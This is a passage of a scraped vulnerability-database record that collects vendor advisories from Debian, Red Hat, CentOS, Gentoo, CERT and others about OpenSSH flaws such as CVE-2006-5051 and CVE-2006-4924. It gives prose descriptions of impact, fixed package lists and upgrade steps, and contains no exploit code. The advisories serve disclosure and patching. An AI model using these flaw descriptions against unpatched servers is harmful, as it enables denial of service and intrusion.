http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch3_s390.udeb\n Size/MD5 checksum: 196900 23c3164ff897157de7fdd6b334a39e95\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client_4.3p2-9etch3_sparc.deb\n Size/MD5 checksum: 640266 7c833bcc2eb5a606be3bc4243313bc97\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server_4.3p2-9etch3_sparc.deb\n Size/MD5 checksum: 218194 eceb87ee9c789edfae071afe782c3a5f\n http://security.debian.org/pool/updates/main/o/openssh/openssh-server-udeb_4.3p2-9etch3_sparc.udeb\n Size/MD5 checksum: 166716 869791f368a6de4cfc3ddd818be8c33f\n http://security.debian.org/pool/updates/main/o/openssh/ssh-askpass-gnome_4.3p2-9etch3_sparc.deb\n Size/MD5 checksum: 99714 8564652d41a2c1709c6d3794b241ddc5\n http://security.debian.org/pool/updates/main/o/openssh/openssh-client-udeb_4.3p2-9etch3_sparc.udeb\n Size/MD5 checksum: 158356 d2f2015c554f5f1cd918d07559f82ebd\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2008-09-16T20:41:42", "published": "2008-09-16T20:41:42", "id": "DEBIAN:DSA-1638-1:1DBC2", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00227.html", "title": "[SECURITY] [DSA 1638-1] New openssh packages fix denial of service", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:59", "bulletinFamily": "unix", "description": " [3.9p1-8.RHEL4.17]\n - CVE-2006-5051 don't call cleanups from signal handler (#208347)\n \n [3.9p1-8.RHEL4.16]\n - CVE-2006-4924 prevent DoS on deattack detector code (#207955) ", "modified": "2006-11-30T00:00:00", "published": "2006-11-30T00:00:00", "id": "ELSA-2006-0697", "href": "http://linux.oracle.com/errata/ELSA-2006-0697.html", "title": "Important openssh security update ", "type": "oraclelinux", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:57", "bulletinFamily": "unix", "description": "[3.9p1-8.RHEL4.24]\n- return correct exit status on failed write on sftp batch mode (#247802)\n[3.9p1-8.RHEL4.23]\n- some more mem leaks fix in sftp (#240909)\n[3.9p1-8.RHEL4.22]\n- CVE-2007-3102 escape account name to prevent audit log injection (#248058)\n[3.9p1-8.RHEL4.21]\n- move pam session calls so pam_close_session is always called (#216689)\n- get canonical hostname for gssapi (#216854)\n- CVE-2006-5052 dont leak info about user existence with krb5 auth (#234643)\n- fix some memory leaks in sftp (#240909)\n- correctly kill sshd in initscript (#244655)\n- close unused ends of sockets so [pam] child is always terminated (#247440)", "modified": "2007-11-27T00:00:00", "published": "2007-11-27T00:00:00", "id": "ELSA-2007-0703", "href": "http://linux.oracle.com/errata/ELSA-2007-0703.html", "title": "openssh security and bug fix update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:37:59", "bulletinFamily": "unix", "description": "[4.3p2-24]\n- fixed audit log injection problem (CVE-2007-3102) (#248059)\n[4.3p2-23]\n- document where the nss certificate and token dbs are looked for\n[4.3p2-22]\n- experimental support for PKCS#11 tokens through libnss3 (#183423)\n[4.3p2-21]\n- fix an information leak in Kerberos password authentication (CVE-2006-5052)\n (#234638)\n- correctly setup context when empty level requested (#234951)\n[4.3p2-20]\n- and always request default level as returned by getseuserbyname (#231695)\n[4.3p2-19]\n- check requested level context against a context with the same role (#231695)\n[4.3p2-18]\n- reject connection if requested mls range is not obtained (#229278)\n[4.3p2-17]\n- allow selecting non-default roles and audit role changes (#227733)", "modified": "2007-11-19T00:00:00", "published": "2007-11-19T00:00:00", "id": "ELSA-2007-0540", "href": "http://linux.oracle.com/errata/ELSA-2007-0540.html", "title": "openssh security and bug fix update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:41", "bulletinFamily": "unix", "description": "\nProblem Description\nThe CRC compensation attack detector in the sshd(8) daemon,\n\t upon receipt of duplicate blocks, uses CPU time cubic in the\n\t number of duplicate blocks received.\t[CVE-2006-4924]\nA race condition exists in a signal handler used by the\n\t sshd(8) daemon to handle the LoginGraceTime option, which\n\t can potentially cause some cleanup routines to be executed\n\t multiple times. [CVE-2006-5051]\nImpact\nAn attacker sending specially crafted packets to sshd(8)\n\t can cause a Denial of Service by using 100% of CPU time\n\t until a connection timeout occurs. Since this attack can be\n\t performed over multiple connections simultaneously, it is\n\t possible to cause up to MaxStartups (10 by default) sshd\n\t processes to use all the CPU time they can obtain.\n\t [CVE-2006-4924]\nThe OpenSSH project believe that the race condition can\n\t lead to a Denial of Service or potentially remote code\n\t execution, but the FreeBSD Security Team has been unable to\n\t verify the exact impact. [CVE-2006-5051]\nWorkaround\nThe attack against the CRC compensation attack detector can\n\t be avoided by disabling SSH Protocol version 1 support in\n\t sshd_config(5).\nThere is no workaround for the second issue.\n", "modified": "2006-09-25T00:00:00", "published": "2006-09-25T00:00:00", "id": "32DB37A5-50C3-11DB-ACF3-000C6EC775D9", "href": "https://vuxml.freebsd.org/freebsd/32db37a5-50c3-11db-acf3-000c6ec775d9.html", "title": "openssh -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2019-05-29T18:33:24", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2006:0697\n\n\nOpenSSH is OpenBSD's SSH (Secure SHell) protocol implementation. This\r\npackage includes the core files necessary for both the OpenSSH client and\r\nserver.\r\n\r\nMark Dowd discovered a signal handler race condition in the OpenSSH sshd\r\nserver. A remote attacker could possibly leverage this flaw to cause a\r\ndenial of service (crash). (CVE-2006-5051) The OpenSSH project believes the\r\nlikelihood of successful exploitation leading to arbitrary code execution\r\nappears remote. However, the Red Hat Security Response Team have not yet\r\nbeen able to verify this claim due to lack of upstream vulnerability\r\ninformation. We are therefore including a fix for this flaw and have rated\r\nit important security severity in the event our continued investigation\r\nfinds this issue to be exploitable.\r\n\r\nTavis Ormandy of the Google Security Team discovered a denial of service\r\nbug in the OpenSSH sshd server. A remote attacker can send a specially\r\ncrafted SSH-1 request to the server causing sshd to consume a large\r\nquantity of CPU resources. (CVE-2006-4924)\r\n\r\nAll users of openssh should upgrade to these updated packages, which\r\ncontain backported patches that resolves these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2006-September/013294.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-September/013295.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-September/013296.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-September/013300.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-September/013301.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-September/013302.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-September/013304.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-September/013305.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-September/013308.html\n\n**Affected packages:**\nopenssh\nopenssh-askpass\nopenssh-askpass-gnome\nopenssh-clients\nopenssh-server\nopenssl\nopenssl-devel\nopenssl-perl\nopenssl096b\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2006-0697.html", "modified": "2006-09-29T17:04:01", "published": "2006-09-29T03:31:38", "href": "http://lists.centos.org/pipermail/centos-announce/2006-September/013294.html", "id": "CESA-2006:0697", "title": "openssh, openssl, openssl096b security update", "type": "centos", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:43", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2006:0698-01\n\n\nOpenSSH is OpenBSD's SSH (Secure SHell) protocol implementation. This\r\npackage includes the core files necessary for both the OpenSSH client and\r\nserver.\r\n\r\nMark Dowd discovered a signal handler race condition in the OpenSSH sshd\r\nserver. A remote attacker could possibly leverage this flaw to cause a\r\ndenial of service (crash). (CVE-2006-5051) The OpenSSH project believes the\r\nlikelihood of successful exploitation leading to arbitrary code execution\r\nappears remote. However, the Red Hat Security Response Team have not yet\r\nbeen able to verify this claim due to lack of upstream vulnerability\r\ninformation. We are therefore including a fix for this flaw and have rated\r\nit important security severity in the event our continued investigation\r\nfinds this issue to be exploitable.\r\n\r\nTavis Ormandy of the Google Security Team discovered a denial of service\r\nbug in the OpenSSH sshd server. A remote attacker can send a specially\r\ncrafted SSH-1 request to the server causing sshd to consume a large\r\nquantity of CPU resources. (CVE-2006-4924)\r\n\r\nAn arbitrary command execution flaw was discovered in the way scp copies\r\nfiles locally. It is possible for a local attacker to create a file with a\r\ncarefully crafted name that could execute arbitrary commands as the user\r\nrunning scp to copy files locally. (CVE-2006-0225)\r\n\r\nThe SSH daemon, when restricting host access by numeric IP addresses and\r\nwith VerifyReverseMapping disabled, allows remote attackers to bypass\r\n\"from=\" and \"user@host\" address restrictions by connecting to a host from a\r\nsystem whose reverse DNS hostname contains the numeric IP address.\r\n(CVE-2003-0386)\r\n\r\nAll users of openssh should upgrade to these updated packages, which\r\ncontain backported patches that resolve these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2006-October/013310.html\n\n**Affected packages:**\nopenssh\nopenssh-askpass\nopenssh-askpass-gnome\nopenssh-clients\nopenssh-server\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "modified": "2006-10-02T01:42:56", "published": "2006-10-02T01:42:56", "href": "http://lists.centos.org/pipermail/centos-announce/2006-October/013310.html", "id": "CESA-2006:0698-01", "title": "openssh security update", "type": "centos", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:25", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2007:0703\n\n\nOpenSSH is OpenBSD's SSH (Secure SHell) protocol implementation. These\npackages include the core files necessary for both the OpenSSH client and\nserver.\n\nA flaw was found in the way the ssh server wrote account names to the\naudit subsystem. An attacker could inject strings containing parts of audit\nmessages which could possibly mislead or confuse audit log parsing tools.\n(CVE-2007-3102)\n\nA flaw was found in the way the OpenSSH server processes GSSAPI\nauthentication requests. When GSSAPI authentication was enabled in OpenSSH\nserver, a remote attacker may have been able to determine if a username is\nvalid. (CVE-2006-5052)\n\nThe following bugs were also fixed:\n\n* the ssh daemon did not generate audit messages when an ssh session was\nclosed.\n\n* GSSAPI authentication sometimes failed on clusters using DNS or\nload-balancing.\n\n* the sftp client and server leaked small amounts of memory in some cases.\n\n* the sftp client didn't properly exit and return non-zero status in batch\nmode when the destination disk drive was full.\n\n* when restarting the ssh daemon with the initscript, the ssh daemon was\nsometimes not restarted successfully because the old running ssh daemon was\nnot properly killed.\n\n* with challenge/response authentication enabled, the pam sub-process was\nnot terminated if the user authentication timed out.\n\nAll users of openssh should upgrade to these updated packages, which\ncontain patches to correct these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2007-November/014421.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-November/014430.html\n\n**Affected packages:**\nopenssh\nopenssh-askpass\nopenssh-askpass-gnome\nopenssh-clients\nopenssh-server\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2007-0703.html", "modified": "2007-11-15T19:13:57", "published": "2007-11-15T15:52:23", "href": "http://lists.centos.org/pipermail/centos-announce/2007-November/014421.html", "id": "CESA-2007:0703", "title": "openssh security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "ubuntu": [{"lastseen": "2019-05-29T17:22:28", "bulletinFamily": "unix", "description": "Tavis Ormandy discovered that the SSH daemon did not properly handle authentication packets with duplicated blocks. By sending specially crafted packets, a remote attacker could exploit this to cause the ssh daemon to drain all available CPU resources until the login grace time expired. (CVE-2006-4924)\n\nMark Dowd discovered a race condition in the server\u2019s signal handling. A remote attacker could exploit this to crash the server. (CVE-2006-5051)", "modified": "2006-10-02T00:00:00", "published": "2006-10-02T00:00:00", "id": "USN-355-1", "href": "https://usn.ubuntu.com/355-1/", "title": "openssh vulnerabilities", "type": "ubuntu", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:45:50", "bulletinFamily": "unix", "description": "OpenSSH is OpenBSD's SSH (Secure SHell) protocol implementation. This\r\npackage includes the core files necessary for both the OpenSSH client and\r\nserver.\r\n\r\nMark Dowd discovered a signal handler race condition in the OpenSSH sshd\r\nserver. A remote attacker could possibly leverage this flaw to cause a\r\ndenial of service (crash). (CVE-2006-5051) The OpenSSH project believes the\r\nlikelihood of successful exploitation leading to arbitrary code execution\r\nappears remote. However, the Red Hat Security Response Team have not yet\r\nbeen able to verify this claim due to lack of upstream vulnerability\r\ninformation. We are therefore including a fix for this flaw and have rated\r\nit important security severity in the event our continued investigation\r\nfinds this issue to be exploitable.\r\n\r\nTavis Ormandy of the Google Security Team discovered a denial of service\r\nbug in the OpenSSH sshd server. A remote attacker can send a specially\r\ncrafted SSH-1 request to the server causing sshd to consume a large\r\nquantity of CPU resources. (CVE-2006-4924)\r\n\r\nAll users of openssh should upgrade to these updated packages, which\r\ncontain backported patches that resolves these issues.", "modified": "2017-09-08T12:12:02", "published": "2006-09-28T04:00:00", "id": "RHSA-2006:0697", "href": "https://access.redhat.com/errata/RHSA-2006:0697", "type": "redhat", "title": "(RHSA-2006:0697) openssh security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:29", "bulletinFamily": "unix", "description": "OpenSSH is OpenBSD's SSH (Secure SHell) protocol implementation. This\r\npackage includes the core files necessary for both the OpenSSH client and\r\nserver.\r\n\r\nMark Dowd discovered a signal handler race condition in the OpenSSH sshd\r\nserver. A remote attacker could possibly leverage this flaw to cause a\r\ndenial of service (crash). (CVE-2006-5051) The OpenSSH project believes the\r\nlikelihood of successful exploitation leading to arbitrary code execution\r\nappears remote. However, the Red Hat Security Response Team have not yet\r\nbeen able to verify this claim due to lack of upstream vulnerability\r\ninformation. We are therefore including a fix for this flaw and have rated\r\nit important security severity in the event our continued investigation\r\nfinds this issue to be exploitable.\r\n\r\nTavis Ormandy of the Google Security Team discovered a denial of service\r\nbug in the OpenSSH sshd server. A remote attacker can send a specially\r\ncrafted SSH-1 request to the server causing sshd to consume a large\r\nquantity of CPU resources. (CVE-2006-4924)\r\n\r\nAn arbitrary command execution flaw was discovered in the way scp copies\r\nfiles locally. It is possible for a local attacker to create a file with a\r\ncarefully crafted name that could execute arbitrary commands as the user\r\nrunning scp to copy files locally. (CVE-2006-0225)\r\n\r\nThe SSH daemon, when restricting host access by numeric IP addresses and\r\nwith VerifyReverseMapping disabled, allows remote attackers to bypass\r\n\"from=\" and \"user@host\" address restrictions by connecting to a host from a\r\nsystem whose reverse DNS hostname contains the numeric IP address.\r\n(CVE-2003-0386)\r\n\r\nAll users of openssh should upgrade to these updated packages, which\r\ncontain backported patches that resolve these issues.", "modified": "2018-03-14T19:26:44", "published": "2006-09-28T04:00:00", "id": "RHSA-2006:0698", "href": "https://access.redhat.com/errata/RHSA-2006:0698", "type": "redhat", "title": "(RHSA-2006:0698) openssh security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:41", "bulletinFamily": "unix", "description": "OpenSSH is OpenBSD's SSH (Secure SHell) protocol implementation. These\npackages include the core files necessary for both the OpenSSH client and\nserver.\n\nA flaw was found in the way the ssh server wrote account names to the audit\nsubsystem. An attacker could inject strings containing parts of audit\nmessages, which could possibly mislead or confuse audit log parsing tools.\n(CVE-2007-3102)\n\nA flaw was found in the way the OpenSSH server processes GSSAPI\nauthentication requests. When GSSAPI authentication was enabled in the\nOpenSSH server, a remote attacker was potentially able to determine if a\nusername is valid. (CVE-2006-5052)\n\nThe following bugs in SELinux MLS (Multi-Level Security) support has also\nbeen fixed in this update:\n\n* It was sometimes not possible to select a SELinux role and level when\nlogging in using ssh.\n\n* If the user obtained a non-default SELinux role or level, the role change\nwas not recorded in the audit subsystem.\n\n* In some cases, on labeled networks, sshd allowed logins from level ranges\nit should not allow.\n\nThe updated packages also contain experimental support for using private\nkeys stored in PKCS#11 tokens for client authentication. The support is\nprovided through the NSS (Network Security Services) library.\n\nAll users of openssh should upgrade to these updated packages, which\ncontain patches to correct these issues.", "modified": "2017-09-08T11:47:53", "published": "2007-11-07T05:00:00", "id": "RHSA-2007:0540", "href": "https://access.redhat.com/errata/RHSA-2007:0540", "type": "redhat", "title": "(RHSA-2007:0540) Moderate: openssh security and bug fix update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-08-13T18:45:20", "bulletinFamily": "unix", "description": "OpenSSH is OpenBSD's SSH (Secure SHell) protocol implementation. These\npackages include the core files necessary for both the OpenSSH client and\nserver.\n\nA flaw was found in the way the ssh server wrote account names to the\naudit subsystem. An attacker could inject strings containing parts of audit\nmessages which could possibly mislead or confuse audit log parsing tools.\n(CVE-2007-3102)\n\nA flaw was found in the way the OpenSSH server processes GSSAPI\nauthentication requests. When GSSAPI authentication was enabled in OpenSSH\nserver, a remote attacker may have been able to determine if a username is\nvalid. (CVE-2006-5052)\n\nThe following bugs were also fixed:\n\n* the ssh daemon did not generate audit messages when an ssh session was\nclosed.\n\n* GSSAPI authentication sometimes failed on clusters using DNS or\nload-balancing.\n\n* the sftp client and server leaked small amounts of memory in some cases.\n\n* the sftp client didn't properly exit and return non-zero status in batch\nmode when the destination disk drive was full.\n\n* when restarting the ssh daemon with the initscript, the ssh daemon was\nsometimes not restarted successfully because the old running ssh daemon was\nnot properly killed.\n\n* with challenge/response authentication enabled, the pam sub-process was\nnot terminated if the user authentication timed out.\n\nAll users of openssh should upgrade to these updated packages, which\ncontain patches to correct these issues.", "modified": "2017-09-08T11:51:05", "published": "2007-11-15T05:00:00", "id": "RHSA-2007:0703", "href": "https://access.redhat.com/errata/RHSA-2007:0703", "type": "redhat", "title": "(RHSA-2007:0703) Moderate: openssh security and bug fix update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:17", "bulletinFamily": "unix", "description": "### Background\n\nOpenSSH is a complete SSH protocol version 1.3, 1.5 and 2.0 implementation and includes sftp client and server support. \n\n### Description\n\nTavis Ormandy of the Google Security Team has discovered a pre-authentication vulnerability, causing sshd to spin until the login grace time has been expired. Mark Dowd found an unsafe signal handler that was vulnerable to a race condition. It has also been discovered that when GSSAPI authentication is enabled, GSSAPI will in certain cases incorrectly abort. \n\n### Impact\n\nThe pre-authentication and signal handler vulnerabilities can cause a Denial of Service in OpenSSH. The vulnerability in the GSSAPI authentication abort could be used to determine the validity of usernames on some platforms. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll OpenSSH users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/openssh-4.4_p1-r5\"", "modified": "2006-11-13T00:00:00", "published": "2006-11-13T00:00:00", "id": "GLSA-200611-06", "href": "https://security.gentoo.org/glsa/200611-06", "type": "gentoo", "title": "OpenSSH: Multiple Denial of Service vulnerabilities", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-06T19:46:00", "bulletinFamily": "unix", "description": "### Background\n\nOpenSSH is a free suite of applications for the SSH protocol, developed and maintained by the OpenBSD project. \n\n### Description\n\nTavis Ormandy of the Google Security Team discovered a Denial of Service vulnerability in the SSH protocol version 1 CRC compensation attack detector. \n\n### Impact\n\nA remote unauthenticated attacker may be able to trigger excessive CPU usage by sending a pathological SSH message, denying service to other legitimate users or processes. \n\n### Workaround\n\nThe system administrator may disable SSH protocol version 1 in /etc/ssh/sshd_config. \n\n### Resolution\n\nAll OpenSSH users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/openssh-4.3_p2-r5\"", "modified": "2006-09-27T00:00:00", "published": "2006-09-27T00:00:00", "id": "GLSA-200609-17", "href": "https://security.gentoo.org/glsa/200609-17", "type": "gentoo", "title": "OpenSSH: Denial of Service", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "cert": [{"lastseen": "2019-10-09T19:51:16", "bulletinFamily": "info", "description": "### Overview \n\nA race condition vulnerability exists in the OpenSSH daemon. Successful exploitation of this vulnerability may result in a denial-of-service condition.\n\n### Description \n\n[OpenSSH](<http://www.openssh.com/>) is an open source client and server implementation of the Secure Shell (SSH) protocol.\n\nThe OpenSSH server includes the ability to authenticate via the Generic Security Services Application Programming Interface ([GSSAPI](<http://tools.ietf.org/html/rfc2743>)). Versions of OpenSSH prior to 4.4 contain a race condition in a signal handler during a logging operation prior to user authentication. \n \nFrom the OpenSSH 4.4 release [notes](<http://openssh.org/txt/release-4.4>): \n_The signal handler was vulnerable to a race condition that could be exploited to perform a pre-authentication denial of service. On portable OpenSSH, this vulnerability could theoretically lead to pre-authentication remote code execution if GSSAPI authentication is enabled, but the likelihood of successful exploitation appears remote._ \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker may be able to cause the OpenSSH server to crash, thereby creating a denial-of-service condition \n \n--- \n \n### Solution \n\n**Upgrade**\n\nSee the systems affected section of this document for information about specific vendors. Users who compile OpenSSH from source are encouraged to update to the most recent version. \n \n--- \n \n \n**Restrict access** \nRestricting access to the SSH daemon may mitigate the affects of this vulnerability. Administrators can use application-level access controls or firewall rules to restrict access to the SSH server. \n \n**Disable the OpenSSH server** \nIf the SSH server functionality is not required, disabling it will limit exposure to this vulnerability. Refer to system-specific documentation on how to disable the OpenSSH server. \n \n--- \n \n### Vendor Information\n\n851340\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Apple Computer, Inc.\n\nUpdated: March 13, 2007 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee <http://docs.info.apple.com/article.html?artnum=305214> for more details.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23851340 Feedback>).\n\n### __ FreeBSD, Inc.\n\nUpdated: October 04, 2006 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee <http://security.freebsd.org/advisories/FreeBSD-SA-06:22.openssh.asc> for more details.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23851340 Feedback>).\n\n### __ Red Hat, Inc.\n\nUpdated: October 03, 2006 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee <http://rhn.redhat.com/errata/RHSA-2006-0697.html> for more details.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23851340 Feedback>).\n\n### __ Ubuntu\n\nUpdated: October 03, 2006 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee <http://www.ubuntu.com/usn/usn-355-1> for more details.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23851340 Feedback>).\n\n### __ OpenSSH\n\nUpdated: October 03, 2006 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee <http://openssh.org/txt/release-4.4> for more details.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23851340 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://rhn.redhat.com/errata/RHSA-2006-0697.html>\n * <http://secunia.com/advisories/22173/>\n * <http://openssh.org/txt/release-4.4>\n * <http://secunia.com/advisories/22208/>\n * <http://secunia.com/advisories/22236/>\n * <http://secunia.com/advisories/22183/>\n * <http://www.ubuntu.com/usn/usn-355-1>\n * <http://tools.ietf.org/html/rfc2743>\n * <http://support.avaya.com/elmodocs2/security/ASA-2006-216.htm>\n * <http://secunia.com/advisories/22362/>\n * <http://www.securityfocus.com/bid/20241>\n * <http://docs.info.apple.com/article.html?artnum=305214>\n\n### Acknowledgements\n\nOpenSSH credits Mark Dowd for reporting this vulnerability.\n\nThis document was written by Ryan Giobbi.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2006-5051](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5051>) \n---|--- \n**Severity Metric:****** | 1.66 \n**Date Public:** | 2006-09-29 \n**Date First Published:** | 2006-10-04 \n**Date Last Updated: ** | 2007-03-13 21:29 UTC \n**Document Revision: ** | 34 \n", "modified": "2007-03-13T21:29:00", "published": "2006-10-04T00:00:00", "id": "VU:851340", "href": "https://www.kb.cert.org/vuls/id/851340", "type": "cert", "title": "OpenSSH contains a race condition vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-10-09T19:51:15", "bulletinFamily": "info", "description": "### Overview \n\nOpenSSH fails to properly handle multiple identical blocks in a SSH packet. This vulnerability may cause a denial-of-service condition.\n\n### Description \n\nOpenSSH is an open source client and server implementation of the Secure Shell (SSH) protocol. OpenSSH includes a cyclic redundancy check (CRC) compensation attack detection function that produces a checksum on a block of data in a SSH packet. This function was introduced to defend against exploitation of CRC weaknesses in version 1 of the SSH protocol (see [VU#13877](<http://www.kb.cert.org/vuls/id/13877>)). Multiple identical blocks contained within a SSH packet may trigger a computationally expensive operation within the CRC attack detector that can lead to a denial of service. According to the OpenSSH 4.4 [release notes](<http://www.openssh.com/txt/release-4.4>):\n\n_[This vulnerability]...would cause sshd(8) to spin until the login grace time expired._ \nThe OpenSSH sshd daemon is only vulnerable when SSH protocol version 1 is enabled. \n \n--- \n \n### Impact \n\nA remote, unauthenticated attacker could cause a denial-of service condition by sending specially crafted packets to the OpenSSH server that would cause it to use excessive CPU time until a connection timeout occurs. \n \n--- \n \n### Solution \n\n**Upgrade** \nSee the systems affected section of this document for information about specific vendors. Users who compile OpenSSH from source are encouraged to update to the most recent version. \n \n--- \n \n**Disable SSH version 1**\n\n \nSSH protocol version 1 should be disabled in order to prevent this vulnerability from occurring on affected systems. \n \n--- \n \n### Vendor Information\n\n787448\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Vendor has issued information\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n__ Affected __ Unknown __ Unaffected \n\n**Javascript is disabled. Click here to view vendors.**\n\n### __ Apple Computer, Inc.\n\nUpdated: March 13, 2007 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nSee <http://docs.info.apple.com/article.html?artnum=305214> for more details.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23787448 Feedback>).\n\n### __ Avaya, Inc.\n\nUpdated: October 23, 2006 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to Avaya Security Alert [ASA-2006-216](<http://support.avaya.com/elmodocs2/security/ASA-2006-216.htm>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23787448 Feedback>).\n\n### __ Debian GNU/Linux\n\nUpdated: October 06, 2006 \n\n### Status\n\n__ Vulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nRefer to 